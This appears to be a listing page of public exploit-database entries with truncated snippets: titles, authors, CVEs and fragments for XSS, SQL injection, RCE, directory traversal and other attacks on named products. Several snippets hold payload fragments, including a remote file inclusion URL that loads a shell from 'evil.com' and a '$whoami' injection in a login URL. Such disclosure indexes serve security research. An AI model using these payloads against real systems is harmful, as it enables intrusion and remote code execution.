LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Facebook Integration Page Name Field

Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting XSS via Facebook Integration Page Name Field Date: 09/06/2025 Exploit Author: Manojkumar J TheWhiteEvil Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/ Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/...

Wordpress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS)

Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting XSS Date: 22 March 2024 Exploit Author: Erdemstar Vendor: https://wordpress.com/ Version: 1.32 Proof Of Concept: 1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or...

Telesquare SDT-CW3B1 1.1.0 - OS Command Injection

!/usr/bin/python3 Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection Date: 24th May 2022 Exploit Author: Bryan Leong Vendor Homepage: http://telesquare.co.kr/ CVE : CVE-2021-46422 Authentication Required: No import requests import argparse import sys from xml.etree import ElementTre...

Contao 4.13.2 - Cross-Site Scripting (XSS)

Exploit Title: Contao 4.13.2 - Cross-Site Scripting XSS Google Dork: NA Date: 04/28/2022 Exploit Author: Chetanya Sharma @AggressiveUser Vendor Homepage: https://contao.org/en/ Software Link: https://github.com/contao/contao/releases/tag/4.13.2 Version: 4.13.2 Tested on: KALI OS CVE : CVE-2022-15...

DLINK DAP-1620 A1 v1.01 - Directory Traversal

Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal Date: 27/4/2022 Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://me.dlink.com/consumer Version: DAP-1620 - A1 v1.01 Tested on: Linux CVE : CVE-2021-46381 POST /apply.cgi HTTP/1.1 Content-Type:...

WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated)

Exploit Title: WordPress Plugin Popup Maker Popup Settings Triggers Add New Cookie Add Cookie Time overwrite the default '1 month' with XSS payload Click 'Add' what triggers the XSS payload Payload examples: alert'XSS';...

Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: Cmsimple 5.4 - Remote Code Execution RCE Authenticated Date: 29.09.2021 Exploit Author: pussycat0x Vendor Homepage: https://www.cmsimple.org/ Version: 5.4 Tested on: ubuntu-20.04.1 import argparse from bs4 import BeautifulSoup from argparse import ArgumentParser import requests...

Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure

Exploit Title: Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure Date: 2021-09-30 Exploit Author: icekam,xiao13,Rainbow,tfsec Software Link: http://www.comprotech.com.hk/ Version: Compro IP70 2.087130218, IP570 2.087130520, IP60, TN540 CVE : CVE-2021-40382 There is an...

Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass

Exploit Title: Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass Date: 2021-02-18 Exploit Author: Suresh Kumar Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/13877/online-exam-timer.html Tested On: Windows 10 Pro 10.0.18363 N...

QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)

Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution Unauthenticated Date: 2020-08-12 Exploit Author: LiquidWorm Vendor Homepage: http://www.howfor.com Tested on: Microsoft Windows Server 2012 R2 Datacenter CVE : N/A...

HelloWeb 2.0 - Arbitrary File Download

Exploit Title: HelloWeb 2.0 - Arbitrary File Download Date: 2020-07-09 Vendor Homepage: https://helloweb.co.kr/ Version: 2.0 Latest and previous versions Exploit Author: bRpsd Contact Author: cyatlive.no Google Dork: inurl:exec/file/download.asp Type: WebApps / ASP...

Navigate CMS 2.8.7 - Authenticated Directory Traversal

Exploit Title: Navigate CMS 2.8.7 - Authenticated Directory Traversal Date: 2020-06-04 Exploit Author: Gus Ralph Vendor Homepage: https://www.navigatecms.com/en/home Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download Version: 2.8.7 Tested o...

FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion

NeXtMaN Here are 3 RFI vulnerabilities in Flashchat i've found: Code: http://site.com/scriptpath/inc/cmses/aedating4CMS.php?dirinc=http://evil.com/shell.txt? http://site.com/scriptpath/inc/cmses/aedatingCMS2.php?dirinc=http://evil.com/shell.txt?...

Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)

Titles: Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting XSS Author: nu11secur1ty Date: 2025-07-18 Vendor: Microsoft Software: Microsoft Edge Browser Reference: https://www.cve.org/CVERecord?id=CVE-2015-6176 !/usr/bin/python nu11secur1ty CVE-2015-6176 import http.server import...

Boa Web Server v0.94.14 - Authentication Bypass

Exploit Title: Boa Web Server v0.94.14 - Authentication Bypass Date: 19-11-2022 Exploit Author: George Tsimpidas Vendor: https://github.com/gpg/boa CVE: N/A Tested on: Debian 5.18.5 Description : Boa Web Server Versions from 0.94.13 - 0.94.14 fail to validate the correct security constraint on th...

Akka HTTP 10.1.14 - Denial of Service

Exploit Title: Akka HTTP Denial of Service via Nested Header Comments Date: 18/4/2022 Exploit Author: cxosmo Vendor Homepage: https://akka.io Software Link: https://github.com/akka/akka-http Version: Akka HTTP 10.1.x 10.1.15 & 10.2.x 10.2.7 Tested on: Akka HTTP 10.2.4, Ubuntu CVE : CVE-2021-42697...

Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation

Exploit Title: Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation Date: 09 Feb 2022 Exploit Author: @ibby Vendor Homepage: https://www.vertiv.com/en-us/ Software Link: https://downloads2.vertivco.com/SerialACS/ACS/ACSv3.3.0-16/FL0536-017.zip Version: Legacy Versions V1.0.0 to...

Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation

Exploit Title: Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation Google Dork: inurl:/wp-content/plugins/js-jobs/ Date: 22/09/2021 Exploit Author: spacehen Vendor Homepage: https://wordpress.org/plugins/js-jobs/ Version: spacehen www.github.com/spacehen" def...

Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: Filerun 2021.03.26 - Remote Code Execution RCE Authenticated Date: 09/21/2021 Exploit Author: syntegris information solutions GmbH Credits: Christian P. Vendor Homepage: https://filerun.com Software Link:...

Dental Clinic Appointment Reservation System 1.0 - 'date' UNION based SQL Injection (Authenticated)

Exploit Title: Dental Clinic Appointment Reservation System 1.0 - 'date' UNION based SQL Injection Authenticated Date: 12.05.2021 Exploit Author: Mesut Cetin Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html Software Link:...

EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting

Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting Exploit Author: Mahendra Purbia Vendor Homepage: http://egavilanmedia.com Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/ Version: 1.0 Tested on: Windows 10 Vulnerable...

Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting

Exploit Title: Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting Date: 2020-07-07 Vendor Homepage: https://powie.de Vendor Changelog: https://wordpress.org/plugins/powies-whois/developers Software Link: https://wordpress.org/plugins/powies-whois/ Exploit Author:...

oXygen XML Editor 21.1.1 - XML External Entity Injection

Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection Author: Pablo Santiago Date: 2019-11-13 Vendor Homepage: https://www.oxygenxml.com/ Source:https://www.oxygenxml.com/xmleditor/downloadoxygenxmleditor.html Version: 21.1.1 CVE : N/A Tested on: Windows 7 PoC 1- python -m...

eMerge50P 5000P 4.6.07 - Remote Code Execution

Exploit Title: eMerge50P 5000P 4.6.07 - Remote Code Execution Google Dork: NA Date: 2018-11-11 Exploit Author: LiquidWorm Vendor Homepage: http://linear-solutions.com/nscfamily/e3-series/ Software Link: http://linear-solutions.com/nscfamily/e3-series/ Version: 4.6.07 Tested on: NA CVE :...

PhreeBooks ERP 5.2.3 - Arbitrary File Upload

PhreeBooks ERP v5.2.3 - Arbitrary File Upload Date: 03.04.2019 Exploit Author: Abdullah Çelebi Vendor Homepage: https://www.phreesoft.com/ Software Link: https://sourceforge.net/projects/phreebooks/files/latest/download Category: Webapps Version: 5.2.3 Tested on: WAMPP @Win Software description:...

vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection

Exploit Title : vBulletin = 4.2.3 SQL Injection CVE-2016-6195 Author : Manish Kishan Tanwar AKA error1046 https://twitter.com/IndiShell1046 Date : 25/08/2015 Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi Tested At : Indishell Laboriginally develop...

White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)

Exploit Title: White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion LFI Date: 2025-07-09 Exploit Author: Imraan Khan Lich-Sec Vendor Homepage: https://wss.com/ Software Link: https://client.protop.co.za/ Version: v4.4.2-2024-11-27 Tested on: Ubuntu 22.04 / Linux CVE: CVE-2025-44177...

Langflow 1.3.0 - Remote Code Execution (RCE)

Exploit Title: Langflow 1.3.0 - Remote Code Execution RCE Date: 2025-04-17 Exploit Author: VeryLazyTech Vendor Homepage: http://www.langflow.org/ Software Link: https://github.com/langflow-ai/langflow Version: Langflow 1.3.0 Tested on: Windows Server 2019 CVE: CVE-2025-3248 CVE-2025-3248 - Remote...

GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS)

Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Stored Cross-Site Scripting Exploit Author: m4xth0r Maximiliano Belino Author website: https://maxibelino.github.io/ Author email: max.cybersecurity at belino.com GitHub disclosure link:...

FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI)

Exploit Title: FoF Pretty Mail 1.1.2 - Server Side Template Injection SSTI Date: 03/28/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://flarum.org/ Software Link: https://github.com/FriendsOfFlarum/pretty-mail Version: 1.1.2 Tested on: Windows XP CVE: N/A Description: The FoF Pretty...

Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)

Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting XSS Exploit Author: tmrswrr Vendor Homepage: https://decapcms.org/docs/intro/ Software Link: https://github.com/decaporg/decap-cms Version: 2.10.192 Tested on: https://cms-demo.netlify.com Description: 1. Go to new post and write...

Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)

Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution RCE + Centos Web Panel 7 - 0.9.8.1147 + Affected Component ip:2031/login/index.php?login=$whoami + Discoverer: Numan Türle @ Gais Cyber Security + Author: Numan Türle + Vendor: https://centos-webpanel.com/ -...

CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path

Exploit Title: CONTPAQi® AdminPAQ 14.0.0 - Unquoted Service Path Discovery by: Angel Canseco Discovery Date: 2022-01-16 Software Link: https://www.contpaqi.com/descargas Tested Version: 14.0.0 Vulnerability Type: Unquoted Service Path Tested on OS: Windows 10 pro x64 english Step to discover...

Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)

Exploit Title: Library Management System 1.0 - Blind Time-Based SQL Injection Unauthenticated Exploit Author: Bobby Cooke @0xBoku & Adeeb Shah @hyd3sec Date: 16/09/2021 Vendor Homepage: https://www.sourcecodester.com/php/12469/library-management-system-using-php-mysql.html Software Link:...

Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)

Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass SQLi Date: 12.05.2021 Exploit Author: Mesut Cetin Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html Software Link:...

ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path

Exploit Title: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path Exploit Author : SamAlucard Exploit Date: 2021-03-21 Software Version : ActivIdentity 8.2 Vendor Homepage : https://www.hidglobal.com/ Tested on OS: Windows 7 Pro ActivIdentity was Acquired by HID Global in Octuber 2010...

Textpattern 4.8.3 - Remote code execution (Authenticated) (2)

Exploit Title: Textpattern 4.8.3 - Remote code execution Authenticated 2 Date: 03/03/2021 Exploit Author: Ricardo Ruiz @ricardojoserf Vendor Homepage: https://textpattern.com/ Software Link: https://textpattern.com/start Version: Previous to 4.8.3 Tested on: CentOS, textpattern 4.5.7 and 4.6.0...

10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)

Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow SEH Date: 2020-12-22 Exploit Author: Florian Gassner Vendor Homepage: https://www.10-strike.com/ Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe Version: 9.05 Tested on...

Online Student's Management System 1.0 - Remote Code Execution (Authenticated)

Exploit Title: Online Student's Management System 1.0 - Remote Code Execution Authenticated Google Dork: N/A Date: 2020/10/18 Exploit Author: Akıner Kısa Vendor Homepage: https://www.sourcecodester.com/php/14490/online-students-management-system-php-full-source-code-2020.html Software Link:...

qdPM 9.1 - Remote Code Execution

Exploit Title: qdPM 9.1 - Remote Code Execution Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net Date: 2020-01-22 Exploit Author: Rishal Dwivedi Loginsoft Vendor Homepage: http://qdpm.net/ Software Link: http://qdpm.net/download-qdpm-free-project-management Version: =1.9.1 Tested on:...

InoERP 0.7.2 - Persistent Cross-Site Scripting

Exploit Title: InoERP 0.7.2 - Persistent Cross-Site Scripting Google Dork: None Date: 2019-09-14 Exploit Author: strider Vendor: http://inoideas.org/ Software Link: https://github.com/inoerp/inoERP Version: 0.7.2 Tested on: Debian 10 Buster x64 / Kali Linux CVE : None...

macOS < 10.14.3 / iOS < 12.1.3 - Arbitrary mach Port Name Deallocation in XPC Services due to Invalid mach Message Parsing in _xpc_serializer_unpack

/ xpcserializerunpack in libxpc parses mach messages which contain xpc messages. There are two reasons for an xpc mach message to contain descriptors: if the message body is large, then it's sent as a MACHMSGOOLDESCRIPTOR. Also if the message contains other port resources eg memory entry ports th...

Microsoft Windows - 'nt!NtQuerySystemInformation (SystemPageFileInformation(Ex))' Kernel 64-bit Stack Memory Disclosure

/ We have discovered that the nt!NtQuerySystemInformation system call invoked with the SystemPageFileInformation 0x12 and SystemPageFileInformationEx 0x90 information classes discloses uninitialized kernel stack memory to user-mode clients. The vulnerability affects 64-bit versions of Windows 7 t...

Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service

''' Application: Java SE Vendor: Oracle Bug: DoS Reported: 23.12.2016 Vendor response: 24.12.2016 Date of Public Advisory: 17.01.2017 Reference: Oracle CPU Jan 2017 Author: Roman Shalymov 1. ADVISORY INFORMATION Title: Oracle OpenJDK - Java Serialization DoS Advisory ID: ERPSCAN-17-006 Risk: High...

Apache - httpOnly Cookie Disclosure

// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08 // Most browsers limit cookies to 4k characters, so we need multiple function setCookies good // Construct string for cookie value var str = ""; for var i=0; i content var content =...

Microsoft Excel Use After Free - Local Code Execution

Titles: Microsoft Excel Use After Free - Local Code Execution Author: nu11secur1ty Date: 06/09/2025 Vendor: Microsoft Software: https://www.microsoft.com/en/microsoft-365/excel?market=af Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751 Versions: MS Excel 2016, MS Office...

OpenSSH server (sshd) 9.8p1 - Race Condition

Exploit Title : OpenSSH server sshd 9.8p1 - Race Condition Author : Milad Karimi Ex3ptionaL Date : 2025-04-16 Description: Targets a signal handler race condition in OpenSSH's server sshd on glibc-based Linux systems. It exploits a vulnerability where the SIGALRM handler calls async-signal-unsafe...

Fundraising Script 1.0 - SQLi

Title: Fundraising Script-1.0 SQLi Author: nu11secur1ty Date: 09/13/2023 Vendor: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/fundraising-script/sectionDemo Reference: https://portswigger.net/web-security/sql-injection Description: The cid parameter appears to be vulnerable to...

Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI

Exploit Title: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI Date: 2022-10-14 Fix Date: 2020-05 Exploit Author: Kahvi-0 Github: https://github.com/Kahvi-0 Vendor Homepage: https://www.mitel.com/ Vendor Security Advisory:...

Osprey Pump Controller 1.0.1 - Administrator Backdoor Access

Exploit Title: Osprey Pump Controller 1.0.1 - Administrator Backdoor Access Exploit Author: LiquidWorm Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage...